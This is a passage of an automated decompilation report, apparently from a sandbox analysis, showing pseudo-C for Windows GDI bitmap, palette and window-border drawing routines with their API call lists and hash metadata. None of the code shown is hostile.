        E0042824C(_t117);
        _v12 = 0;
        _v20 = 0;
        _push(_t137);
        _push(0x428f53);
        _push( *[fs:eax]);
        *[fs:eax] = _t140;
        _v12 = E00426C14(GetDC(0));
        _v20 = E00426C14(CreateCompatibleDC(_v12));
        _v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
        if(_v8 == 0) {
            L17:
            _t68 = 0;
            _pop(_t126);
            *[fs:eax] = _t126;
            _push(0x428f5a);
            if(_v20 != 0) {
                _t68 = DeleteDC(_v20);
            }
            if(_v12 != 0) {
                return ReleaseDC(0, _v12);
            }
            return _t68;
        } else {
            _v32 = SelectObject(_v20, _v8);
            if(_t130 != 0x1fffffff) {
                _v16 = E00426C14(CreateCompatibleDC(_v12));
                _push(_t137);
                _push(0x428f0b);
                _push( *[fs:eax]);
                *[fs:eax] = _t140;
                if(_v96 == 0) {
                    _v21 = 0;
                } else {
                    _v21 = 1;
                    _v92 = 0;
                    _t117 = E00428690(_t117, _t133, _t133, 0, &_v116);
                }
                _v28 = SelectObject(_v16, _t117);
                if(_t133 != 0) {
                    SelectPalette(_v16, _t133, 0);
                    RealizePalette(_v16);
                    SelectPalette(_v20, _t133, 0);
                    RealizePalette(_v20);
                }
                _t82 = SetBkColor(_v16, _t130);
                BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
                SetBkColor(_v16, _t82);
                if(_v28 != 0) {
                    SelectObject(_v16, _v28);
                }
                if(_v21 != 0) {
                    DeleteObject(_t117);
                }
                _pop(_t127);
                *[fs:eax] = _t127;
                _push(0x428f12);
                return DeleteDC(_v16);
            } else {
                PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                if(_v32 != 0) {
                    SelectObject(_v20, _v32);
                }
                goto L17;
            }
        }
    }
}


                                                                            APIs
                                                                            • GetObjectA.GDI32(?,00000054,?), ref: 00428D7B
                                                                            • GetDC.USER32(00000000), ref: 00428DA9
                                                                            • CreateCompatibleDC.GDI32(?), ref: 00428DBA
                                                                            • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00428DD5
                                                                            • SelectObject.GDI32(?,00000000), ref: 00428DEF
                                                                            • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00428E11
                                                                            • CreateCompatibleDC.GDI32(?), ref: 00428E1F
                                                                            • SelectObject.GDI32(?), ref: 00428E67
                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 00428E7A
                                                                            • RealizePalette.GDI32(?), ref: 00428E83
                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 00428E8F
                                                                            • RealizePalette.GDI32(?), ref: 00428E98
                                                                            • SetBkColor.GDI32(?), ref: 00428EA2
                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00428EC6
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00428ED0
                                                                            • SelectObject.GDI32(?,00000000), ref: 00428EE3
                                                                            • DeleteObject.GDI32 ref: 00428EEF
                                                                            • DeleteDC.GDI32(?), ref: 00428F05
                                                                            • SelectObject.GDI32(?,00000000), ref: 00428F20
                                                                            • DeleteDC.GDI32(00000000), ref: 00428F3C
                                                                            • ReleaseDC.USER32 ref: 00428F4D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                                            • String ID:
                                                                            • API String ID: 332224125-0
                                                                            • Opcode ID: 043915a6f0d82eb22a204992b68ef0e525db3ffd50e10b4cd51da9086477a0f8
                                                                            • Instruction ID: 9b296df3905ff11574ab74c4800e5112e9892f6b575cab52e3ab6da5b25098aa
                                                                            • Opcode Fuzzy Hash: 043915a6f0d82eb22a204992b68ef0e525db3ffd50e10b4cd51da9086477a0f8
                                                                            • Instruction Fuzzy Hash: 92513F71F00315AFDB10EBE9DC45FAEB7FCEB08704F51446AB214E7281CA7999508B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
E00429A80(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, char* _a4) {
    intOrPtr _v8;
    intOrPtr* _v12;
    struct HDC__* _v16;
    struct HDC__* _v20;
    void* _v24;
    BITMAPINFOHEADER* _v28;
    intOrPtr _v32;
    intOrPtr _v36;
    signed int _v37;
    struct HBITMAP__* _v44;
    void* _v48;
    struct HPALETTE__* _v52;
    struct HPALETTE__* _v56;
    intOrPtr* _v60;
    intOrPtr* _v64;
    signed short _v66;
    signed short _v68;
    signed short _v70;
    signed short _v72;
    void* _v76;
    intOrPtr _v172;
    char _v174;
    intOrPtr _t151;
    signed int _t161;
    signed int _t165;
    intOrPtr _t169;
    signed int _t224;
    intOrPtr _t251;
    intOrPtr* _t255;
    intOrPtr _t261;
    signed int _t298;
    intOrPtr _t301;
    intOrPtr _t302;
    intOrPtr _t307;
    signed int _t328;
    void* _t330;
    void* _t331;
    signed int _t332;
    void* _t333;
    void* _t334;
    void* _t335;
    intOrPtr _t336;

    _t327 = __edi;
    _t334 = _t335;
    _t336 = _t335 + 0xffffff54;
    _t330 = __ecx;
    _v12 = __edx;
    _v8 = __eax;
    _v52 = 0;
    _v44 = 0;
    _v60 = 0;
    *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t333);
    _v37 = _v36 == 0xc;
    if(_v37 != 0) {
        _v36 = 0x28;
    }
    _v28 = E00402D0C(_v36 + 0x40c);
    _v64 = _v28;
    _push(_t334);
    _push(0x429fa1);
    _push( *[fs:edx]);
    *[fs:edx] = _t336;
    _push(_t334);
    _push(0x429f74);
    _push( *[fs:edx]);
    *[fs:edx] = _t336;
    if(_v37 == 0) {
        *((intOrPtr*)( *_v12 + 0xc))();
        _t331 = _t330 - _v36;
        _t151 = *((intOrPtr*)(_v64 + 0x10));
        if(_t151 != 3 && _t151 != 0) {
            _v60 = E004038F8(1);
            if(_a4 == 0) {
                E00403264( &_v174, 0xe);
                _v174 = 0x4d42;
                _v172 = _v36 + _t331;
                _a4 = &_v174;
            }
            *((intOrPtr*)( *_v60 + 0x10))();
            *((intOrPtr*)( *_v60 + 0x10))();
            *((intOrPtr*)( *_v60 + 0x10))();
            E0041C924(_v60, *_v60, _v12, _t327, _t331, _t331, 0);
            *((intOrPtr*)( *_v60 + 0x14))();
            _v12 = _v60;
        }
    } else {
        *((intOrPtr*)( *_v12 + 0xc))();
        _t261 = _v64;
        E00403264(_t261, 0x28);
        _t251 = _t261;
        *(_t251 + 4) = _v72 & 0x0000ffff;
        *(_t251 + 8) = _v70 & 0x0000ffff;
        *((short*)(_t251 + 0xc)) = _v68 & 0x0000ffff;
        *((short*)(_t251 + 0xe)) = _v66 & 0x0000ffff;
        _t331 = _t330 - 0xc;
    }
    _t255 = _v64;
    *_t255 = _v36;
    _v32 = _v28 + _v36;
    if( *((short*)(_t255 + 0xc)) != 1) {
        E00426B00();
    }
    if(_v36 == 0x28) {
        _t224 = *(_t255 + 0xe) & 0x0000ffff;
        if(_t224 == 0x10 || _t224 == 0x20) {
            if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
                E0041C8B4(_v12, 0xc, _v32);
                _v32 = _v32 + 0xc;
                _t331 = _t331 - 0xc;
            }
        }
    }
    if( *(_t255 + 0x20) == 0) {
        *(_t255 + 0x20) = E00426D84( *(_t255 + 0xe) & 0x0000ffff);
    }
    _t328 = _v37 & 0x000000ff;
    _t79 = _t328 + 0x461ef0; // 0xc08b0304
    E0041C8B4(_v12, *(_t255 + 0x20) * ( *_t79 & 0x000000ff), _v32);
    _t83 = _t328 + 0x461ef0; // 0xc08b0304
    _t332 = _t331 - *(_t255 + 0x20) * ( *_t83 & 0x000000ff);
    if( *(_t255 + 0x14) == 0 || *((intOrPtr*)(_t255 + 0x10)) == 0) {
        _t298 = *(_t255 + 0xe) & 0x0000ffff;
        _t161 = E00426DA4( *((intOrPtr*)(_t255 + 4)), 0x20, _t298);
        asm("cdq");
        *(_t255 + 0x14) = _t161 * (( *(_t255 + 8) ^ _t298) - _t298);
    }
    _t165 = *(_t255 + 0x14);
    if(_t332 > _t165) {
        _t332 = _t165;
    }
    if(_v37 != 0) {
        E00427050(_v32);
    }
    _v16 = E00426C14(GetDC(0));
    _push(_t334);
    _push(0x429eef);
    _push( *[fs:edx]);
    *[fs:edx] = _t336;
    _t169 = *((intOrPtr*)(_v64 + 0x10));
    if(_t169 == 0 || _t169 == 3) {
        if( *0x461c5c == 0) {
            _v44 = CreateDIBSection(_v16, _v28, 0, &_v24, 0, 0);
            if(_v44 == 0 || _v24 == 0) {
                if(GetLastError() != 0) {
                    E0040D764();
                } else {
                    E00426B00();
                }
            }
            _push(_t334);
            _push( *[fs:eax]);
            *[fs:eax] = _t336;
            E0041C8B4(_v12, _t332, _v24);
            _pop(_t301);
            *[fs:eax] = _t301;
            _t302 = 0x429ebe;
            *[fs:eax] = _t302;
            _push(0x429ef6);
            return ReleaseDC(0, _v16);
        } else {
            goto L28;
        }
    } else {
        L28:
        _v20 = 0;
        _v24 = E00402D0C(_t332);
        _push(_t334);
        _push(0x429e57);
        _push( *[fs:edx]);
        *[fs:edx] = _t336;
        E0041C8B4(_v12, _t332, _v24);
        _v20 = E00426C14(CreateCompatibleDC(_v16));
        _v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
        _v56 = 0;
        _t198 = *((intOrPtr*)(_v64 + 0x20));
        if( *((intOrPtr*)(_v64 + 0x20)) > 0) {
            _v52 = E0042730C(0, _t198);
            _v56 = SelectPalette(_v20, _v52, 0);
            RealizePalette(_v20);
        }
        _push(_t334);
        _push(0x429e2b);
        _push( *[fs:edx]);
        *[fs:edx] = _t336;
        _v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
        if(_v44 == 0) {
            if(GetLastError() != 0) {
                E0040D764();
            } else {
                E00426B00();
            }
        }
        _pop(_t307);
        *[fs:eax] = _t307;
        _push(0x429e32);
        if(_v56 != 0) {
            SelectPalette(_v20, _v56, 0xffffffff);
        }
        return DeleteObject(SelectObject(_v20, _v48));
    }
}

                                                                            0x00429cd2
                                                                            0x00429cd5
                                                                            0x00429cda
                                                                            0x00429cdc
                                                                            0x00429cdc
                                                                            0x00429ce2
                                                                            0x00429ce7
                                                                            0x00429ce7
                                                                            0x00429cf8
                                                                            0x00429cfd
                                                                            0x00429cfe
                                                                            0x00429d03
                                                                            0x00429d06
                                                                            0x00429d0c
                                                                            0x00429d11
                                                                            0x00429d1f
                                                                            0x00429e75
                                                                            0x00429e7c
                                                                            0x00429e8b
                                                                            0x00429e94
                                                                            0x00429e8d
                                                                            0x00429e8d
                                                                            0x00429e8d
                                                                            0x00429e8b
                                                                            0x00429e9b
                                                                            0x00429ea1
                                                                            0x00429ea4
                                                                            0x00429eaf
                                                                            0x00429eb6
                                                                            0x00429eb9
                                                                            0x00429ed8
                                                                            0x00429edb
                                                                            0x00429ede
                                                                            0x00429eee
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00429d25
                                                                            0x00429d25
                                                                            0x00429d27
                                                                            0x00429d31
                                                                            0x00429d36
                                                                            0x00429d37
                                                                            0x00429d3c
                                                                            0x00429d3f
                                                                            0x00429d4a
                                                                            0x00429d5d
                                                                            0x00429d77
                                                                            0x00429d7c
                                                                            0x00429d82
                                                                            0x00429d87
                                                                            0x00429d95
                                                                            0x00429da7
                                                                            0x00429dae
                                                                            0x00429dae
                                                                            0x00429db5
                                                                            0x00429db6
                                                                            0x00429dbb
                                                                            0x00429dbe
                                                                            0x00429dd7
                                                                            0x00429dde
                                                                            0x00429de7
                                                                            0x00429df0
                                                                            0x00429de9
                                                                            0x00429de9
                                                                            0x00429de9
                                                                            0x00429de7
                                                                            0x00429df7
                                                                            0x00429dfa
                                                                            0x00429dfd
                                                                            0x00429e06
                                                                            0x00429e12
                                                                            0x00429e12
                                                                            0x00429e2a
                                                                            0x00429e2a

                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 00429CEE
                                                                            • CreateCompatibleDC.GDI32(00000001), ref: 00429D53
                                                                            • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 00429D68
                                                                            • SelectObject.GDI32(?,00000000), ref: 00429D72
                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 00429DA2
                                                                            • RealizePalette.GDI32(?), ref: 00429DAE
                                                                            • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 00429DD2
                                                                            • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00429E2B,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00429DE0
                                                                            • SelectPalette.GDI32(?,00000000,000000FF), ref: 00429E12
                                                                            • SelectObject.GDI32(?,?), ref: 00429E1F
                                                                            • DeleteObject.GDI32(00000000), ref: 00429E25
                                                                            Strings
                                                                            • ( , xrefs: 00429C39
                                                                            • BM , xrefs: 00429BA4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                                            • String ID: ($BM
                                                                            • API String ID: 2831685396-2980357723
                                                                            • Opcode ID: fc53f77d9d0130592b0a5017607ebe5ebc1f106cd622e18b61ea29ba8ac1efbb
                                                                            • Instruction ID: 5f09fdd2a9c8d3bf44ec303fddff0b4bf25abaa9eceda00dd836569603864da6
                                                                            • Opcode Fuzzy Hash: fc53f77d9d0130592b0a5017607ebe5ebc1f106cd622e18b61ea29ba8ac1efbb
                                                                            • Instruction Fuzzy Hash: FFD12970B002189FDF14EFA9D885BAEBBF5EF48304F55846AE904A7395D7389C40CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 62%
E0044323C(intOrPtr* __eax, intOrPtr __edx) {
    intOrPtr* _v8;
    intOrPtr _v12;
    struct HDC__* _v16;
    struct tagRECT _v32;
    struct tagRECT _v48;
    signed int _v60;
    signed int _v64;
    struct HRGN__* _t169;
    signed int _t204;
    intOrPtr* _t210;
    intOrPtr* _t213;
    intOrPtr _t220;
    signed int _t223;
    intOrPtr _t247;
    signed int _t248;
    void* _t263;
    void* _t266;
    void* _t268;
    intOrPtr _t269;

    _t266 = _t268;
    _t269 = _t268 + 0xffffffc4;
    _v12 = __edx;
    _v8 = __eax;
    if( *(_v8 + 0x195) != 0 || *(_v8 + 0x19c) > 0) {
        _v16 = GetWindowDC(E004423F8(_v8));
        _push(_t266);
        _push(0x4434ef);
        _push( *[fs:ecx]);
        *[fs:ecx] = _t269;
        GetClientRect(E004423F8(_v8), &_v32);
        GetWindowRect(E004423F8(_v8), &_v48);
        MapWindowPoints(0, E004423F8(_v8), &_v48, "true");
        OffsetRect( &_v32, ~(_v48.left), ~(_v48.top));
        ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
        asm("movsd");
        asm("movsd");
        asm("movsd");
        asm("movsd");
        InflateRect( &_v32, *(_v8 + 0x19c), *(_v8 + 0x19c));
        asm("movsd");
        asm("movsd");
        asm("movsd");
        asm("movsd");
        _t223 = GetWindowLongA(E004423F8(_v8), 0xfffffff0);
        if((_t223 & 0x00200000) != 0) {
            _t213 = *0x462c28; // 0x466310
            _v48.right = _v48.right + *((intOrPtr*)( *_t213))(0x14);
        }
        if((_t223 & 0x00100000) != 0) {
            _t210 = *0x462c28; // 0x466310
            _v48.bottom = _v48.bottom + *((intOrPtr*)( *_t210))(0x15);
        }
        if( *(_v8 + 0x195) != 0) {
            _t263 = 0;
            _t248 = *(_v8 + 0x193) & 0x000000ff;
            if(_t248 != 0) {
                _t263 = 0 + *((intOrPtr*)(_v8 + 0x198));
            }
            _t204 = *(_v8 + 0x194) & 0x000000ff;
            if(_t204 != 0) {
                _t263 = _t263 + *((intOrPtr*)(_v8 + 0x198));
            }
            if(( *(_v8 + 0x192) & 0x00000001) != 0) {
                _v48.left = _v48.left - _t263;
            }
            if(( *(_v8 + 0x192) & 0x00000002) != 0) {
                _v48.top = _v48.top - _t263;
            }
            if(( *(_v8 + 0x192) & 0x00000004) != 0) {
                _v48.right = _v48.right + _t263;
            }
            if(( *(_v8 + 0x192) & 0x00000008) != 0) {
                _v48.bottom = _v48.bottom + _t263;
            }
            DrawEdge(_v16, &_v48, *(0x46262c + (_t248 & 0x0000007f) * 4) | *(0x46263c + (_t204 & 0x0000007f) * 4), *(_v8 + 0x192) & 0x000000ff | *(0x46264c + ( *(_v8 + 0x195) & 0x000000ff) * 4) | *(0x46265c + ( *(_v8 + 0x1d9) & 0x000000ff) * 4) | 0x00002000);
        }
        IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
        asm("movsd");
        asm("movsd");
        asm("movsd");
        asm("movsd");
        _t169 = *(_v12 + 4);
        if(_t169 != 1) {
            GetRgnBox(_t169, &_v32);
            MapWindowPoints(0, E004423F8(_v8), &_v32, "true");
            IntersectRect( &_v48, &_v48, &_v32);
            OffsetRect( &_v48, ~_v64, ~_v60);
        } else {
            OffsetRect( &_v48, ~_v48, ~(_v48.top));
        }
        FillRect(_v16, &_v48, E004261BC( *((intOrPtr*)(_v8 + 0x1a4))));
        _pop(_t247);
        *[fs:eax] = _t247;
        _push(0x4434f6);
        return ReleaseDC(E004423F8(_v8), _v16);
    } else {
        *((intOrPtr*)( *_v8 - 0x10))();
        _t220 = E0042DC7C(E0042DB74());
        if(_t220 != 0) {
            _t220 = _v8;
            if(( *(_t220 + 0x52) & 0x00000002) != 0) {
                _t220 = E0042E248(E0042DB74(), 0, _v8);
            }
        }
        return _t220;
    }
}


                                                                            APIs
                                                                            • GetWindowDC.USER32(00000000), ref: 00443270
                                                                            • GetClientRect.USER32 ref: 00443293
                                                                            • GetWindowRect.USER32 ref: 004432A5
                                                                            • MapWindowPoints.USER32 ref: 004432BB
                                                                            • OffsetRect.USER32(?,?,?), ref: 004432D0
                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,00000000,?,00000000,?), ref: 004432E9
                                                                            • InflateRect.USER32(?,00000000,00000000), ref: 00443307
                                                                            • GetWindowLongA.USER32 ref: 00443321
                                                                            • DrawEdge.USER32(?,?,?,00000008), ref: 00443420
                                                                            • IntersectClipRect.GDI32(?,?,?,?,?), ref: 00443439
                                                                            • OffsetRect.USER32(?,?,?), ref: 00443463
                                                                            • GetRgnBox.GDI32(?,?), ref: 00443472
                                                                            • MapWindowPoints.USER32 ref: 00443488
                                                                            • IntersectRect.USER32 ref: 00443499
                                                                            • OffsetRect.USER32(?,?,?), ref: 004434AE
                                                                            • FillRect.USER32 ref: 004434CA
                                                                            • ReleaseDC.USER32 ref: 004434E9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
                                                                            • String ID:
                                                                            • API String ID: 2490777911-0
                                                                            • Opcode ID: 6e3754b0df94dcb7bcdb5046d3db607f40a88203350a562e934c88a292f62008
                                                                            • Instruction ID: 7b120e4924686e31309899fdc82388f4ae83de811d5366100fd5c7bdcafe2d3f
                                                                            • Opcode Fuzzy Hash: 6e3754b0df94dcb7bcdb5046d3db607f40a88203350a562e934c88a292f62008
                                                                            • Instruction Fuzzy Hash: 5EA12E71E00148AFDB01DFA9C986EDEB7F9AF09704F1440A6F915F7291C679AE01CB64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
E00429268(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
    intOrPtr _v8;
    struct HPALETTE__* _v12;
    char _v13;
    struct tagPOINT _v21;
    struct HDC__* _v28;
    void* _v32;
    struct HPALETTE__* _t78;
    signed int _t84;
    signed int _t85;
    signed int _t86;
    char _t87;
    void* _t140;
    intOrPtr* _t170;
    intOrPtr _t184;
    intOrPtr _t186;
    int* _t190;
    intOrPtr _t192;
    void* _t194;
    void* _t195;
    intOrPtr _t196;

    _t171 = __ecx;
    _t194 = _t195;
    _t196 = _t195 + 0xffffffe4;
    _t190 = __ecx;
    _v8 = __edx;
    _t170 = __eax;
    _t192 = *((intOrPtr*)(__eax + 0x28));
    E004268F8(_v8, __ecx, *0x4294b4 & 0x000000ff, __ecx);
    E004297F8(_t170);
    _v12 = 0;
    _v13 = 0;
    _t78 = *(_t192 + 0x10);
    if(_t78 != 0) {
        _v12 = SelectPalette( *(_v8 + 4), _t78, 0xffffffff);
        RealizePalette( *(_v8 + 4));
        _v13 = 1;
    }
    _push(GetDeviceCaps( *(_v8 + 4), 0xc));
    _t84 = GetDeviceCaps( *(_v8 + 4), 0xe);
    _pop(_t85);
    _t86 = _t85 * _t84;
    if(_t86 > 8) {
        L4:
        _t87 = 0;
    } else {
        _t171 = *(_t192 + 0x28) & 0x0000ffff;
        if(_t86 < ( *(_t192 + 0x2a) & 0x0000ffff) * ( *(_t192 + 0x28) & 0x0000ffff)) {
            _t87 = 1;
        } else {
            goto L4;
        }
    }
    if(_t87 == 0) {
        if(E004295F4(_t170) == 0) {
            SetStretchBltMode(E0042681C(_v8), 3);
        }
    } else {
        GetBrushOrgEx( *(_v8 + 4), &_v21);
        SetStretchBltMode( *(_v8 + 4), 4);
        SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y, &_v21);
    }
    _push(_t194);
    _push(0x4294a6);
    _push( *[fs:eax]);
    *[fs:eax] = _t196;
    if( *((intOrPtr*)( *_t170 + 0x28))() != 0) {
        E00429798(_t170, _t171);
    }
    E004268F8(E00429538(_t170), _t171, *0x4294b4 & 0x000000ff, _t190);
    if( *((intOrPtr*)( *_t170 + 0x28))() == 0) {
        StretchBlt( *(_v8 + 4), *_t190, _t190[1], _t190[2] - *_t190, _t190[3] - _t190[1], *(E00429538(_t170) + 4), 0, 0, *(_t192 + 0x1c), *(_t192 + 0x20), *(_v8 + 0x20));
        _pop(_t184);
        *[fs:eax] = _t184;
        _push(0x4294ad);
        if(_v13 != 0) {
            return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
        }
        return 0;
    } else {
        _v32 = 0;
        _v28 = 0;
        _push(_t194);
        _push(0x42943b);
        _push( *[fs:eax]);
        *[fs:eax] = _t196;
        _v28 = E00426C14(CreateCompatibleDC(0));
        _v32 = SelectObject(_v28, *(_t192 + 0xc));
        E00426DC4( *(_v8 + 4), _t170, _t190[1], *_t190, _t190, _t192, 0, 0, _v28, *(_t192 + 0x20), *(_t192 + 0x1c), 0, 0, *(E00429538(_t170) + 4), _t190[3] - _t190[1], _t190[2] - *_t190);
        _t140 = 0;
        _pop(_t186);
        *[fs:eax] = _t186;
        _push(0x429480);
        if(_v32 != 0) {
            _t140 = SelectObject(_v28, _v32);
        }
        if(_v28 != 0) {
            return DeleteDC(_v28);
        }
        return _t140;
    }
}


                                                                            APIs
                                                                              • Part of subcall function 004297F8: GetDC.USER32(00000000), ref: 0042984E
                                                                              • Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863
                                                                              • Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D
                                                                              • Part of subcall function 004297F8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891
                                                                              • Part of subcall function 004297F8: ReleaseDC.USER32 ref: 0042989C
                                                                            • SelectPalette.GDI32(?,?,000000FF), ref: 004292AB
                                                                            • RealizePalette.GDI32(?), ref: 004292BA
                                                                            • GetDeviceCaps.GDI32(?,0000000C), ref: 004292CC
                                                                            • GetDeviceCaps.GDI32(?,0000000E), ref: 004292DB
                                                                            • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042930E
                                                                            • SetStretchBltMode.GDI32(?,00000004), ref: 0042931C
                                                                            • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00429334
                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 00429351
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 004293B2
                                                                            • SelectObject.GDI32(?,?), ref: 004293C7
                                                                            • SelectObject.GDI32(?,00000000), ref: 00429426
                                                                            • DeleteDC.GDI32(00000000), ref: 00429435
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                                                                            • String ID:
                                                                            • API String ID: 2414602066-0
                                                                            • Opcode ID: e3fba3740f0dcb9a9556d00d241c3eff92958012f974742950326578c5eef44f
                                                                            • Instruction ID: d82af69fe42d34c23c978d2582e61c5ab2b2549b478e9a14ed03732d0c903b0f
                                                                            • Opcode Fuzzy Hash: e3fba3740f0dcb9a9556d00d241c3eff92958012f974742950326578c5eef44f
                                                                            • Instruction Fuzzy Hash: 66714975B04214AFDB10EFA9D985F5AB7F8EF08304F51856AB509E7281D638ED018B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 64%
E00426C24(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
    void* _v8;
    int _v12;
    int _v16;
    struct HBITMAP__* _v20;
    struct HDC__* _v24;
    struct HDC__* _v28;
    struct HDC__* _v32;
    int _v48;
    int _v52;
    void _v56;
    void* _t78;
    intOrPtr _t85;
    intOrPtr _t86;
    void* _t91;
    void* _t93;
    void* _t94;
    intOrPtr _t95;

    _t93 = _t94;
    _t95 = _t94 + 0xffffffcc;
    asm("movsd");
    asm("movsd");
    _t77 = __ecx;
    _v8 = __eax;
    _v28 = CreateCompatibleDC(0);
    _v32 = CreateCompatibleDC(0);
    _push(_t93);
    _push(0x426d72);
    _push( *[fs:eax]);
    *[fs:eax] = _t95;
    GetObjectA(_v8, 0x18, &_v56);
    if(__ecx == 0) {
        _v24 = GetDC(0);
        if(_v24 == 0) {
            E00426B6C(_t77);
        }
        _push(_t93);
        _push(0x426ce1);
        _push( *[fs:eax]);
        *[fs:eax] = _t95;
        _v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
        if(_v20 == 0) {
            E00426B6C(_t77);
        }
        _pop(_t85);
        *[fs:eax] = _t85;
        _push(0x426ce8);
        return ReleaseDC(0, _v24);
    } else {
        _v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
        if(_v20 != 0) {
            _t78 = SelectObject(_v28, _v8);
            _t91 = SelectObject(_v32, _v20);
            StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
            if(_t78 != 0) {
                SelectObject(_v28, _t78);
            }
            if(_t91 != 0) {
                SelectObject(_v32, _t91);
            }
        }
        _pop(_t86);
        *[fs:eax] = _t86;
        _push(0x426d79);
        DeleteDC(_v28);
        return DeleteDC(_v32);
    }
}


                                                                            APIs
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00426C3B
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00426C45
                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00426C65
                                                                            • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00426C7C
                                                                            • GetDC.USER32(00000000), ref: 00426C88
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00426CB5
                                                                            • ReleaseDC.USER32 ref: 00426CDB
                                                                            • SelectObject.GDI32(?,?), ref: 00426CF6
                                                                            • SelectObject.GDI32(?,00000000), ref: 00426D05
                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00426D31
                                                                            • SelectObject.GDI32(?,00000000), ref: 00426D3F
                                                                            • SelectObject.GDI32(?,00000000), ref: 00426D4D
                                                                            • DeleteDC.GDI32(?), ref: 00426D63
